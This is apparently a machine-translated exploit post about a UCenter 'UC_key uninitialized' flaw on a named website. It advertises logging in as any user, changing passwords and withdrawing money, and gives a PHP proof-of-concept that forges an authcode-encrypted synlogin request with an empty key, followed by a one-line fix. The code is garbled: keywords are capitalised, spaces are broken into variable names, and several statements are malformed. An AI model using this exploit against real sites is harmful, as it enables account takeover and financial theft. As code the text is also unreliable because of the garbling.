Brief description: A lot of rebates, any user login, or even withdrawal!
Http://www.bkjia.com/uc. php
When ucenter is not enabled in the background, a typical UC_key uninitialized vulnerability exists.
As UCkey is not initialized, visitors can call various functions of the uc interface at will.
Including automatic login and password change
Proof of vulnerability: poc:
<? Php
Print_r ('
---------------------------------------
UC_key Uninitialized Vul Exploit
---------------------------------------
');
If ($ argc <2 ){
Print_r ('
Usage: php '. $ argv [0]. 'username
Username: the admin username
Example: php '. $ argv [0]. 'admin
');
Die ();
}
Error_reporting (0 );
$ Username = $ argv [1];
$ Key = '';
$ Code = 'time = 11111111111 & username = '. $ username.' & action = synlogin ';
$ X = urlencode (authcode ($ code, "ENCODE", $ key ));
Print_r ('plz copy this code ~~ Enjoy it ~~ Pai_^
/Api/uc. php? Code = '. $ x );
Function authcode ($ string, $ operation = 'decode', $ key = '', $ expiry = 0 ){
$ Ckey_length = 4;
$ Key = md5 ($ key? $ Key: UC_KEY );
$ Keya = md5 (substr ($ key, 0, 16 ));
$ Keyb = md5 (substr ($ key, 16, 16 ));
$ Keyc = $ ckey_length? ($ Operation = 'decode '? Substr ($ string, 0, $ ckey_length): substr (md5 (microtime (),-$ ckey_length )):'';
$ Cryptkey = $ keya. md5 ($ keya. $ keyc );
$ Key_length = strlen ($ cryptkey );
$ String = $ operation = 'decode '? Base64_decode (substr ($ string, $ ckey_length): sprintf ('% 010d', $ expiry? $ Expiry + time (): 0). substr (md5 ($ string. $ keyb), 0, 16). $ string;
$ String_length = strlen ($ string );
$ Result = '';
$ Box = range (1, 0,255 );
$ Rndkey = array ();
For ($ I = 0; $ I <= 255; $ I ++ ){
$ Rndkey [$ I] = ord ($ cryptkey [$ I % $ key_length]);
}
For ($ j = $ I = 0; I I <256; $ I ++ ){
$ J = ($ j + $ box [$ I] + $ rndkey [$ I]) % 256;
$ Tmp = $ box [$ I];
$ Box [$ I] = $ box [$ j];
$ Box [$ j] = $ tmp;
}
For ($ a = $ j = $ I = 0; $ I <$ string_length; $ I ++ ){
$ A = ($ a + 1) % 256;
$ J = ($ j + $ box [$ a]) % 256;
$ Tmp = $ box [$ a];
$ Box [$ a] = $ box [$ j];
$ Box [$ j] = $ tmp;
$ Result. = chr (ord ($ string [$ I]) ^ ($ box [($ box [$ a] + $ box [$ j]) % 256]);
}
If ($ operation = 'decode '){
If (substr ($ result, 0, 10) = 0 | substr ($ result, 0, 10)-time ()> 0) & substr ($ result, 10, 16) = substr (md5 (substr ($ result, 26 ). $ keyb), 0, 16 )){
Return substr ($ result, 26 );
} Else {
Return '';
}
} Else {
Return $ keyc. str_replace ('=', '', base64_encode ($ result ));
}
}
?>
Solution:
Delete uc. php when ucenter integration is not enabled in the background or disabled
No problem when enabling
Author fadhack